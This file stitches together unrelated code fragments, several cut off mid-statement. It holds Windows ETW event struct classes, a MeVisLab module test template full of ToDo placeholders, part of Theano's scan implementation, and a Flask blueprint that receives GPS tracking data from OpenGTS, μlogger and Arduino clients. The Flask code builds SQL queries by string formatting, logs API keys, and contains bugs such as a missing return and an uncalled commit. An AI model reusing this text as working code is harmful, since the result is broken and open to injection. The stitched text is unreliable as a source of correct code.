class Microsoft_Windows_AppModel_Exec_191_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=192, version=0)
class Microsoft_Windows_AppModel_Exec_192_0(Etw):
pattern = Struct(
"PsmKey" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=193, version=0)
class Microsoft_Windows_AppModel_Exec_193_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=194, version=0)
class Microsoft_Windows_AppModel_Exec_194_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"State" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=195, version=0)
class Microsoft_Windows_AppModel_Exec_195_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"State" / Int32ul,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=196, version=0)
class Microsoft_Windows_AppModel_Exec_196_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"Bool" / Int8ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=197, version=0)
class Microsoft_Windows_AppModel_Exec_197_0(Etw):
pattern = Struct(
"PsmKey" / WString,
"State" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=198, version=0)
class Microsoft_Windows_AppModel_Exec_198_0(Etw):
pattern = Struct(
"PackageFullName" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=199, version=0)
class Microsoft_Windows_AppModel_Exec_199_0(Etw):
pattern = Struct(
"PackageFullName" / WString
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=200, version=0)
class Microsoft_Windows_AppModel_Exec_200_0(Etw):
pattern = Struct(
"PackageFullName" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=201, version=0)
class Microsoft_Windows_AppModel_Exec_201_0(Etw):
pattern = Struct(
"PackageFullName" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=202, version=0)
class Microsoft_Windows_AppModel_Exec_202_0(Etw):
pattern = Struct(
"PackageFullName" / WString,
"ErrorCode" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=203, version=0)
class Microsoft_Windows_AppModel_Exec_203_0(Etw):
pattern = Struct(
"ValueName" / WString,
"Timeout" / Int32ul
)
@declare(guid=guid("eb65a492-86c0-406a-bace-9912d595bd69"), event_id=204, version=0)
class Microsoft_Windows_AppModel_Exec_204_0(Etw):
pattern = Struct(
| |
<reponame>hjkuijf/MidsagittalApp
# **InsertLicense** code
from mevis import *
from TestSupport import Base, Fields, Logging, ScreenShot
from TestSupport.Macros import *
from AlgorithmModuleTestSupport import Checks as AMChecks
from AlgorithmModuleTestSupport import Tests as AMTests
from AlgorithmModule.Definitions import StatusCode
#----------------------------------------------------------------------------------
MODULE_NAME = "MidsagittalSurfaceSplit"
class TestData( object ):
"""Contains a setting of input and corresponding reference output field values."""
def __init__( self ):
self.input0Path = None
self.inMidsagittalSurfacePath = None
self.inIntersectionMode = None
self.inVolumeThreshold = None
self.inUseGlobalSubsample = None
self.inGlobalSubsample = None
self.inXSubsample = None
self.inYSubsample = None
self.inZSubsample = None
self.output0ReferencePath = None
def executeTestOfUpdate( testData ):
__provideInput( testData )
__processInput()
__validateOutput( testData )
def __provideInput( testData ):
__setUpNetworkWithInput( testData )
def __setUpNetworkWithInput( testData ):
__setUpInputObjects( testData )
__setUpInputParameters( testData )
def __setUpInputObjects( testData ):
__loadFileWithLocalModule( "Load_input0", testData.input0Path )
__loadFileWithLocalModule( "Load_inMidsagittalSurface", testData.inMidsagittalSurfacePath )
def __loadFileWithLocalModule( moduleName, filePath ):
if ( filePath != None ):
Fields.setValue( "{}.name".format( moduleName ), filePath )
Fields.touch( "{}.load".format( moduleName ))
else:
Fields.touch( "{}.close".format( moduleName ))
def __setUpInputParameters( testData ):
Fields.setValue( "{}.inIntersectionMode".format( MODULE_NAME ), testData.inIntersectionMode )
Fields.setValue( "{}.inVolumeThreshold".format( MODULE_NAME ), testData.inVolumeThreshold )
Fields.setValue( "{}.inUseGlobalSubsample".format( MODULE_NAME ), testData.inUseGlobalSubsample )
Fields.setValue( "{}.inGlobalSubsample".format( MODULE_NAME ), testData.inGlobalSubsample )
Fields.setValue( "{}.inXSubsample".format( MODULE_NAME ), testData.inXSubsample )
Fields.setValue( "{}.inYSubsample".format( MODULE_NAME ), testData.inYSubsample )
Fields.setValue( "{}.inZSubsample".format( MODULE_NAME ), testData.inZSubsample )
def __processInput():
AMTests.testUpdate( MODULE_NAME )
def __validateOutput( testData ):
__setUpNetworkWithOutputReference( testData )
__executeChecksToValidateOutput( testData )
def __setUpNetworkWithOutputReference( testData ):
__setUpOutputReferenceObjects( testData )
def __setUpOutputReferenceObjects( testData ):
__loadFileWithLocalModule( "Load_output0_Reference", testData.output0ReferencePath )
def __executeChecksToValidateOutput( testData ):
checkList = __getChecksToValidateOutputAfterUpdate( testData )
for check in checkList:
check.execute()
def __getChecksToValidateOutputAfterUpdate( testData ):
checks = (
AMChecks.ImageCompareCheck( "Validate_output0" ),
)
return checks
def __getDefaultTestData():
"""Returns a default and valid TestData object."""
Logging.infoHTML( "<b>ToDo: Set valid values for default TestData object!</b>" )
testData = TestData()
testData.input0Path = None
testData.inMidsagittalSurfacePath = None
testData.inIntersectionMode = None
testData.inVolumeThreshold = None
testData.inUseGlobalSubsample = None
testData.inGlobalSubsample = None
testData.inXSubsample = None
testData.inYSubsample = None
testData.inZSubsample = None
testData.output0ReferencePath = None
return testData
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Image_input0():
"""Tests occurrence of an error because of an invalid image provided at field "input0"."""
Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
testDataVariations = {
"Missing_Object" : __getMissingObjectTestData_input0(),
}
return ( testDataVariations, testError_input0 )
def __getMissingObjectTestData_input0():
testData = __getDefaultTestData()
# Note: None as path value prevents loading.
testData.input0Path = None
return testData
def testError_input0( testData ):
__provideInput( testData )
checksToExecute = (
AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
value = StatusCode.ERROR_INPUT_OBJECT ),
)
AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Base_inMidsagittalSurface():
"""Tests occurrence of an error because of an invalid Base object connected at field "inMidsagittalSurface"."""
Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
testDataVariations = {
"Missing_Object" : __getMissingObjectTestData_inMidsagittalSurface(),
"Empty_Object" : __getEmptyObjectTestData_inMidsagittalSurface(),
}
return ( testDataVariations, testError_inMidsagittalSurface )
def __getMissingObjectTestData_inMidsagittalSurface():
testData = __getDefaultTestData()
# Note: None as path value prevents loading.
testData.inMidsagittalSurfacePath = None
return testData
def __getEmptyObjectTestData_inMidsagittalSurface():
testData = __getDefaultTestData()
Logging.infoHTML( "<b>ToDo: Replace \"None\" with a path pointing to an empty object!</b>" )
testData.inMidsagittalSurfacePath = None
return testData
def testError_inMidsagittalSurface( testData ):
__provideInput( testData )
checksToExecute = (
AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
value = StatusCode.ERROR_INPUT_OBJECT ),
)
AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Parameter_inIntersectionMode():
"""Tests occurrence of an error because of an invalid input value provided at field "inIntersectionMode"."""
Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
testDataVariations = {
"Invalid_Variation_1" : __getInvalidTestDataVariation1_inIntersectionMode(),
"Invalid_Variation_2" : __getInvalidTestDataVariation2_inIntersectionMode(),
}
return ( testDataVariations, testError_inIntersectionMode )
def __getInvalidTestDataVariation1_inIntersectionMode():
Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
testData = __getDefaultTestData()
Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inIntersectionMode\"!</b>" )
testData.inIntersectionMode = None
return testData
def __getInvalidTestDataVariation2_inIntersectionMode():
Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
testData = __getDefaultTestData()
Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inIntersectionMode\"!</b>" )
testData.inIntersectionMode = None
return testData
def testError_inIntersectionMode( testData ):
__provideInput( testData )
checksToExecute = (
AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
value = StatusCode.ERROR_INPUT_PARAMETER ),
)
AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Parameter_inVolumeThreshold():
"""Tests occurrence of an error because of an invalid input value provided at field "inVolumeThreshold"."""
Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
testDataVariations = {
"Invalid_Variation_1" : __getInvalidTestDataVariation1_inVolumeThreshold(),
"Invalid_Variation_2" : __getInvalidTestDataVariation2_inVolumeThreshold(),
}
return ( testDataVariations, testError_inVolumeThreshold )
def __getInvalidTestDataVariation1_inVolumeThreshold():
Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
testData = __getDefaultTestData()
Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inVolumeThreshold\"!</b>" )
testData.inVolumeThreshold = None
return testData
def __getInvalidTestDataVariation2_inVolumeThreshold():
Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
testData = __getDefaultTestData()
Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inVolumeThreshold\"!</b>" )
testData.inVolumeThreshold = None
return testData
def testError_inVolumeThreshold( testData ):
__provideInput( testData )
checksToExecute = (
AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
value = StatusCode.ERROR_INPUT_PARAMETER ),
)
AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Parameter_inUseGlobalSubsample():
"""Tests occurrence of an error because of an invalid input value provided at field "inUseGlobalSubsample"."""
Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
testDataVariations = {
"Invalid_Variation_1" : __getInvalidTestDataVariation1_inUseGlobalSubsample(),
"Invalid_Variation_2" : __getInvalidTestDataVariation2_inUseGlobalSubsample(),
}
return ( testDataVariations, testError_inUseGlobalSubsample )
def __getInvalidTestDataVariation1_inUseGlobalSubsample():
Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
testData = __getDefaultTestData()
Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inUseGlobalSubsample\"!</b>" )
testData.inUseGlobalSubsample = None
return testData
def __getInvalidTestDataVariation2_inUseGlobalSubsample():
Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
testData = __getDefaultTestData()
Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inUseGlobalSubsample\"!</b>" )
testData.inUseGlobalSubsample = None
return testData
def testError_inUseGlobalSubsample( testData ):
__provideInput( testData )
checksToExecute = (
AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
value = StatusCode.ERROR_INPUT_PARAMETER ),
)
AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Parameter_inGlobalSubsample():
"""Tests occurrence of an error because of an invalid input value provided at field "inGlobalSubsample"."""
Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
testDataVariations = {
"Invalid_Variation_1" : __getInvalidTestDataVariation1_inGlobalSubsample(),
"Invalid_Variation_2" : __getInvalidTestDataVariation2_inGlobalSubsample(),
}
return ( testDataVariations, testError_inGlobalSubsample )
def __getInvalidTestDataVariation1_inGlobalSubsample():
Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
testData = __getDefaultTestData()
Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inGlobalSubsample\"!</b>" )
testData.inGlobalSubsample = None
return testData
def __getInvalidTestDataVariation2_inGlobalSubsample():
Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
testData = __getDefaultTestData()
Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inGlobalSubsample\"!</b>" )
testData.inGlobalSubsample = None
return testData
def testError_inGlobalSubsample( testData ):
__provideInput( testData )
checksToExecute = (
AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
value = StatusCode.ERROR_INPUT_PARAMETER ),
)
AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Parameter_inXSubsample():
"""Tests occurrence of an error because of an invalid input value provided at field "inXSubsample"."""
Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
testDataVariations = {
"Invalid_Variation_1" : __getInvalidTestDataVariation1_inXSubsample(),
"Invalid_Variation_2" : __getInvalidTestDataVariation2_inXSubsample(),
}
return ( testDataVariations, testError_inXSubsample )
def __getInvalidTestDataVariation1_inXSubsample():
Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
testData = __getDefaultTestData()
Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inXSubsample\"!</b>" )
testData.inXSubsample = None
return testData
def __getInvalidTestDataVariation2_inXSubsample():
Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
testData = __getDefaultTestData()
Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inXSubsample\"!</b>" )
testData.inXSubsample = None
return testData
def testError_inXSubsample( testData ):
__provideInput( testData )
checksToExecute = (
AMChecks.EqualCheck( fieldName = "{}.statusCode".format( MODULE_NAME ),
value = StatusCode.ERROR_INPUT_PARAMETER ),
)
AMTests.testFailedUpdate( MODULE_NAME, checksToExecute )
#----------------------------------------------------------------------------------
def ITERATIVETEST_Error_Of_Input_Parameter_inYSubsample():
"""Tests occurrence of an error because of an invalid input value provided at field "inYSubsample"."""
Logging.infoHTML( "<b>ToDo: Add more \"TestData\" objects to maximize variations!</b>" )
testDataVariations = {
"Invalid_Variation_1" : __getInvalidTestDataVariation1_inYSubsample(),
"Invalid_Variation_2" : __getInvalidTestDataVariation2_inYSubsample(),
}
return ( testDataVariations, testError_inYSubsample )
def __getInvalidTestDataVariation1_inYSubsample():
Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
testData = __getDefaultTestData()
Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inYSubsample\"!</b>" )
testData.inYSubsample = None
return testData
def __getInvalidTestDataVariation2_inYSubsample():
Logging.infoHTML( "<b>ToDo: Rename function that the name matches the intention of returned test data!</b>" )
testData = __getDefaultTestData()
Logging.infoHTML( "<b>ToDo: Replace \"None\" with a reliable invalid value of \"inYSubsample\"!</b>" )
testData.inYSubsample = None
return testData
def testError_inYSubsample( testData ):
__provideInput( testData )
checksToExecute = (
AMChecks.EqualCheck( fieldName = | |
will be ``x[k:]``. Looking at this split, elements in
``x[:k]`` are ordered exactly like those in ``init_y``.
* ``taps`` -- Temporal taps of the output that will be pass to
``fn``. They are provided as a list of *negative* integers,
where a value ``k`` implies that at iteration step ``t`` scan
will pass to ``fn`` the slice ``t+k``.
``scan`` will follow this logic if partial information is given:
* If an output is not wrapped in a dictionary, ``scan`` will wrap
it in one assuming that you use only the last step of the output
(i.e. it makes your tap value list equal to [-1]).
* If you wrap an output in a dictionary and you do not provide any
taps but you provide an initial state it will assume that you are
using only a tap value of -1.
* If you wrap an output in a dictionary but you do not provide any
initial state, it assumes that you are not using any form of
taps.
* If you provide a ``None`` instead of a variable or a empty
dictionary ``scan`` assumes that you will not use any taps for
this output (like for example in case of a map)
If ``outputs_info`` is an empty list or None, ``scan`` assumes
that no tap is used for any of the outputs. If information is
provided just for a subset of the outputs an exception is
raised (because there is no convention on how scan should map
the provided information to the outputs of ``fn``)
non_sequences
``non_sequences`` is the list of arguments that are passed to
``fn`` at each steps. One can opt to exclude variable
used in ``fn`` from this list as long as they are part of the
computational graph, though for clarity we encourage not to do so.
n_steps
``n_steps`` is the number of steps to iterate given as an int
or Theano scalar. If any of the input sequences do not have
enough elements, scan will raise an error. If the *value is 0* the
outputs will have *0 rows*. If the value is negative, ``scan``
will run backwards in time. If the ``go_backwards`` flag is already
set and also ``n_steps`` is negative, ``scan`` will run forward
in time. If n_steps is not provided, ``scan`` will figure
out the amount of steps it should run given its input sequences.
truncate_gradient
``truncate_gradient`` is the number of steps to use in truncated
BPTT. If you compute gradients through a scan op, they are
computed using backpropagation through time. By providing a
different value then -1, you choose to use truncated BPTT instead
of classical BPTT, where you go for only ``truncate_gradient``
number of steps back in time.
go_backwards
``go_backwards`` is a flag indicating if ``scan`` should go
backwards through the sequences. If you think of each sequence
as indexed by time, making this flag True would mean that
``scan`` goes back in time, namely that for any sequence it
starts from the end and goes towards 0.
name
When profiling ``scan``, it is crucial to provide a name for any
instance of ``scan``. The profiler will produce an overall
profile of your code as well as profiles for the computation of
one step of each instance of ``scan``. The ``name`` of the instance
appears in those profiles and can greatly help to disambiguate
information.
mode
It is recommended to leave this argument to None, especially
when profiling ``scan`` (otherwise the results are not going to
be accurate). If you prefer the computations of one step of
``scan`` to be done differently then the entire function, you
can use this parameter to describe how the computations in this
loop are done (see ``theano.function`` for details about
possible values and their meaning).
profile
Flag or string. If true, or different from the empty string, a
profile object will be created and attached to the inner graph of
scan. In case ``profile`` is True, the profile object will have the
name of the scan instance, otherwise it will have the passed string.
Profile object collect (and print) information only when running the
inner graph with the new cvm linker ( with default modes,
other linkers this argument is useless)
allow_gc
Set the value of allow gc for the internal graph of scan. If
set to None, this will use the value of config.scan.allow_gc.
strict
If true, all the shared variables used in ``fn`` must be provided as a
part of ``non_sequences`` or ``sequences``.
Returns
-------
tuple
Tuple of the form (outputs, updates); ``outputs`` is either a
Theano variable or a list of Theano variables representing the
outputs of ``scan`` (in the same order as in ``outputs_info``).
``updates`` is a subclass of dictionary specifying the update rules for
all shared variables used in scan.
This dictionary should be passed to ``theano.function`` when you compile
your function. The change compared to a normal dictionary is that we
validate that keys are SharedVariable and addition of those dictionary
are validated to be consistent.
"""
# General observation : this code is executed only once, at creation
# of the computational graph, so we don't yet need to be smart about
# anything (to speed things up)
##
# Step 1. Wrap all inputs in dictionaries and add default values
##
# check if inputs are just single variables instead of lists
def wrap_into_list(x):
"""
Wrap the input into a list if it is not already a list.
"""
if x is None:
return []
elif not isinstance(x, (list, tuple)):
return [x]
else:
return list(x)
seqs = wrap_into_list(sequences)
outs_info = wrap_into_list(outputs_info)
# Make sure we get rid of numpy arrays or ints or anything like that
# passed as inputs to scan
non_seqs = []
for elem in wrap_into_list(non_sequences):
if not isinstance(elem, gof.Variable):
non_seqs.append(tensor.as_tensor_variable(elem))
else:
non_seqs.append(elem)
# If we provided a known number of steps ( before compilation)
# and if that number is 1 or -1, then we can skip the Scan Op,
# and just apply the inner function once
# To do that we check here to see the nature of n_steps
n_fixed_steps = None
if isinstance(n_steps, (float, int)):
n_fixed_steps = int(n_steps)
else:
try:
n_fixed_steps = opt.get_scalar_constant_value(n_steps)
except tensor.basic.NotScalarConstantError:
n_fixed_steps = None
# Check n_steps is an int
if (hasattr(n_steps, 'dtype') and
str(n_steps.dtype)[:3] not in ('uin', 'int')):
raise ValueError(' n_steps must be an int. dtype provided '
'is %s' % n_steps.dtype)
# compute number of sequences and number of outputs
n_seqs = len(seqs)
n_outs = len(outs_info)
return_steps = OrderedDict()
# wrap sequences in a dictionary if they are not already dictionaries
for i in xrange(n_seqs):
if not isinstance(seqs[i], dict):
seqs[i] = OrderedDict([('input', seqs[i]), ('taps', [0])])
elif seqs[i].get('taps', None) is not None:
seqs[i]['taps'] = wrap_into_list(seqs[i]['taps'])
elif seqs[i].get('taps', None) is None:
# seqs dictionary does not have the ``taps`` key
seqs[i]['taps'] = [0]
# wrap outputs info in a dictionary if they are not already in one
for i in xrange(n_outs):
if outs_info[i] is not None:
if isinstance(outs_info[i], dict):
# DEPRECATED :
if outs_info[i].get('return_steps', None) is not None:
raise ValueError(
"Using `return_steps` has been deprecated. "
"Simply select the entries you need using a "
"subtensor. Scan will optimize memory "
"consumption, so do not worry about that.")
# END
if not isinstance(outs_info[i], dict):
# by default any output has a tap value of -1
outs_info[i] = OrderedDict([('initial', outs_info[i]), ('taps', [-1])])
elif (outs_info[i].get('initial', None) is None and
outs_info[i].get('taps', None) is not None):
# ^ no initial state but taps provided
raise ValueError(('If you are using slices of an output '
'you need to provide a initial state '
'for it'), outs_info[i])
elif (outs_info[i].get('initial', None) is not None and
outs_info[i].get('taps', None) is None):
# ^ initial state but taps not provided
if 'taps' in outs_info[i]:
| |
limit
)
)
current_app.logger.debug(q2)
result = db.session.execute(q2)
trackjson = result.fetchall()
if trackjson:
# if we have only one point
if len(trackjson) == 1:
y = trackjson[0][0]
# if we want multiple points
else:
y = ""
z = 0
for x in trackjson:
if z != 0:
y += ", "
y += x[0]
z += 1
data = '{"type":"FeatureCollection","features":[' + y + "]}"
current_app.logger.debug(y)
response = current_app.response_class(
response=data, status=200, mimetype="application/json"
)
return response
else:
fakeresponse
else:
return fakeresponse
# if track does not exist in our database, we are sending a fake one
# instead of
else:
return fakeresponse
@blueprint.route("/gnss/img/<string:track_rid>.svg")
def geosvg(track_rid):
"""Sends a GeoJON built from a track."""
# fake response is the same for all cases
fakesvg = '<svg xmlns="http://www.w3.org/2000/svg" width="400" height="180">\
<rect x="50" y="20" rx="20" ry="20" width="150" height="150" style="\
fill:red;stroke:black;stroke-width:5;opacity:0.5" /></svg>'
fakeresponse = current_app.response_class(
response=fakesvg, status=200, mimetype="image/svg+xml"
)
# check if track_id was provided and is an int, else flask sends 404
if isinstance(track_rid, str):
# check if track exist
rid = uuid.UUID(track_rid)
r1 = Trackz.query.filter_by(id=rid).first()
if not r1:
# if track does not exist in our database, we are sending a fake one
# instead of
return fakeresponse
# here we ask for a specific track in plain SQL as it is simpler
# we cut results to 6 decimal places as it gives ~11cm accuracy which is enough - but it does not work as subq?
sql = text(
"SELECT ST_AsSVG(ST_MakeLine(ST_Transform(points.geom,4326) ORDER BY points.timez),1,6) \
FROM points WHERE points.track_id = {};".format(
track_rid
)
)
result = db.session.execute(sql)
tracksvg = result.fetchone() # TODO: maybe .fetchall() some day?
current_app.logger.debug(tracksvg)
data = '<svg xmlns="http://www.w3.org/2000/svg">\
<path d="{}" fill="cadetblue" /></svg>'.format(
tracksvg[0]
)
response = current_app.response_class(
response=data, status=200, mimetype="image/svg+xml"
)
db.session.close()
return response
@blueprint.route("/gnss/data/opengts")
def opengts():
"""Receives data from OpenGTS compatible receiver device.
http://www.opengts.org/OpenGTS_Config.pdf
http://www.geotelematic.com/docs/StatusCodes.pdf
"""
alt = request.args.get("alt")
apicode = request.args.get("acct")
code = request.args.get("code")
gprmc = request.args.get("gprmc")
device = request.args.get("id")
current_app.logger.debug("alt = {}".format(alt))
current_app.logger.debug("id = {}".format(apicode))
current_app.logger.debug("code = {}".format(code))
current_app.logger.debug("device = {}".format(device))
current_app.logger.debug("gprmc = {}".format(gprmc))
# parsing id to match GNSS Api
haskey = ApiKey.query.filter_by(apikey=apicode).first()
if haskey:
user_id = haskey.user_id
current_app.logger.info(
"Found valid API code belonging to User ID = {}.".format(user_id)
)
else:
current_app.logger.info(
"No user has such an API key = {}. Ignoring request then.".format(id)
)
return "Hello?"
# code 0xF020 means OpenGTS location reporting
if code == "0xF020":
# parsing NMEA-0183 $GPRMC record
gpsdata = parse_rmc(gprmc)
current_app.logger.debug("parsed gprmc: {}".format(gpsdata))
# checking tracks database for the data and device
trackdb = Trackz.query.filter_by(
trackdate=gpsdata["trackdate"], device=device
).first()
if trackdb:
current_app.logger.debug("trackdb: {}".format(trackdb))
else:
# we need to create a track
trackdb = Trackz.create(
name="OpenGTS",
user_id=user_id,
start=datetime.utcnow(),
description="LiveTracking",
device=device,
trackdate=gpsdata["trackdate"],
rid=uuid.uuid4(),
)
current_app.logger.debug("trackdb: {}".format(trackdb))
# we have track id, now we must check if the location was not already
# submitted, as it looks like opengts often tries to resubmit the same
# points over and over again.
points = Pointz.query.filter_by(
track_id=trackdb.id,
geom="SRID=4326;POINT({} {})".format(gpsdata["lon"], gpsdata["lat"]),
timez=gpsdata["timez"],
).first()
if not points:
# uff, now we can finally submit location
points = Pointz.create(
track_id=trackdb.id,
geom="SRID=4326;POINT({} {})".format(gpsdata["lon"], gpsdata["lat"]),
altitude=alt,
timez=gpsdata["timez"],
speed=gpsdata["speed"],
bearing=gpsdata["bearing"],
comment="OpenGTS",
sat=None,
vdop=None,
pdop=None,
hdop=None,
provider="gps",
)
# at the end we are updating the track table with current time
current_app.logger.debug(points)
trackdb.stop = datetime.utcnow()
db.session.commit
db.session.close()
else:
current_app.logger.debug("We already have that point recorded. Thank you.")
#
return "OK"
@blueprint.route("/client/index.php", methods=["GET", "POST"])
@csrf_protect.exempt
def uloggerlogin():
"""μlogger client compatibility."""
current_app.logger.debug(request.get_data())
if request.method == "POST":
action = request.form["action"]
if action == "auth":
# username and password are the same at the moment
password = <PASSWORD>.form["<PASSWORD>"]
username = request.form["user"]
# parsing id to match GNSS Api
haskey = ApiKey.query.filter_by(apikey=password).first()
if haskey:
user_id = haskey.user_id
current_app.logger.info(
"Found valid API code belonging to User ID = {}.".format(user_id)
)
session["username"] = user_id
# send a success to the app
return jsonify(error=False)
else:
current_app.logger.info(
"No user has such an API key = {}. Ignoring request then.".format(
id
)
)
# send error to the app as we do not have such a user
return jsonify(error=True, message="go away")
elif action == "addtrack":
if "username" in session:
username = session["username"]
else:
current_app.logger.info("Not logged in.")
return jsonify(error=True, message="go away")
# adding a new track
trackname = request.form["track"]
trackdb = Trackz.create(
name=trackname,
user_id=username,
start=datetime.utcnow(),
description="LiveTracking",
device="μlogger",
trackdate=datetime.utcnow(),
rid=uuid.uuid4(),
)
current_app.logger.debug("trackdb: {}".format(trackdb))
return jsonify(error=False, trackid=trackdb.id)
elif action == "addpos":
if "username" in session:
username = session["username"]
else:
current_app.logger.info("Not logged in.")
return jsonify(error=True, message="go away")
# adding new point to existing track
lat = request.form["lat"]
lon = request.form["lon"]
tstamp = datetime.fromtimestamp(int(request.form["time"]))
trackid = request.form["trackid"]
try:
alti = request.form["altitude"]
except Exception as e:
alti = 0
current_app.logger.debug(e)
try:
provider = request.form["provider"]
except Exception as e:
provider = "unknown"
current_app.logger.debug(e)
try:
accu = request.form["accuracy"]
except Exception as e:
accu = "unknown"
current_app.logger.debug(e)
# we have track id, now we must check if the location was not already
# submitted, as it looks like ulogger sometimes tries to resubmit the same
# points over and over again.
points = Pointz.query.filter_by(
track_id=trackid,
geom="SRID=4326;POINT({} {})".format(lon, lat),
timez=tstamp,
).first()
if not points:
# uff, now we can finally submit location
newpoint = Pointz.create(
track_id=trackid,
geom="SRID=4326;POINT({} {})".format(lon, lat),
altitude=alti,
timez=tstamp,
provider=provider,
comment=accu,
speed=0,
bearing=0,
hdop=0,
vdop=0,
pdop=0,
sat=0,
)
if newpoint:
current_app.logger.info("New point added: {}".format(newpoint))
return jsonify(error=False)
else:
return jsonify(
error=True, message="problemz with adding, check the server."
)
else:
current_app.logger.info(
"This point is already added, ignoring: {}".format(points)
)
return jsonify(error=False)
db.session.commit
db.session.close()
@blueprint.route("/mkr")
@csrf_protect.exempt
def mkr():
"""Receives data from Arduino receiver device, which is my another project.
"""
# mandatory values
apicode = request.args.get("apikey")
device = request.args.get("id")
# src has two possible values: gps & gsm
src = request.args.get("src")
# Building datetime from URI
gps_day = request.args.get("da")
gps_month = request.args.get("mo")
gps_year = request.args.get("ye")
gps_minute = request.args.get("mi")
gps_hour = request.args.get("ho")
gps_second = request.args.get("se")
gps_datetime_string = "{}-{}-{} {}:{}:{}".format(gps_day, gps_month, gps_year, gps_hour, gps_minute, gps_second)
gps_datetime = datetime.strptime(gps_datetime_string, "%d-%m-%y %H:%M:%S")
gps_date = date(int(gps_year), int(gps_month), int(gps_day))
if src == 'gps':
lat = float(request.args.get("lat"))/10000000
lon = float(request.args.get("lon"))/10000000
else:
lat = float(request.args.get("lat"))
lon = float(request.args.get("lon"))
# optional values:
if request.args.get("he"):
gps_head = request.args.get("he")
if gps_head == "999999.000000":
gps_head = None
else:
gps_head = None
if request.args.get("alt"):
gps_alt = request.args.get("alt")
else:
gps_alt = None
if request.args.get("sp"):
gps_speed = request.args.get("sp")
else:
gps_speed = None
# current_app.logger.debug("date = {}".format(gps_datetime))
if request.args.get("sat"):
gps_sat = request.args.get("sat")
else:
gps_sat = None
# parsing id to match GNSS Api
haskey = ApiKey.query.filter_by(apikey=apicode).first()
if haskey:
user_id = haskey.user_id
# current_app.logger.debug(
# "Found valid API code belonging to User ID = {}.".format(user_id)
# )
else:
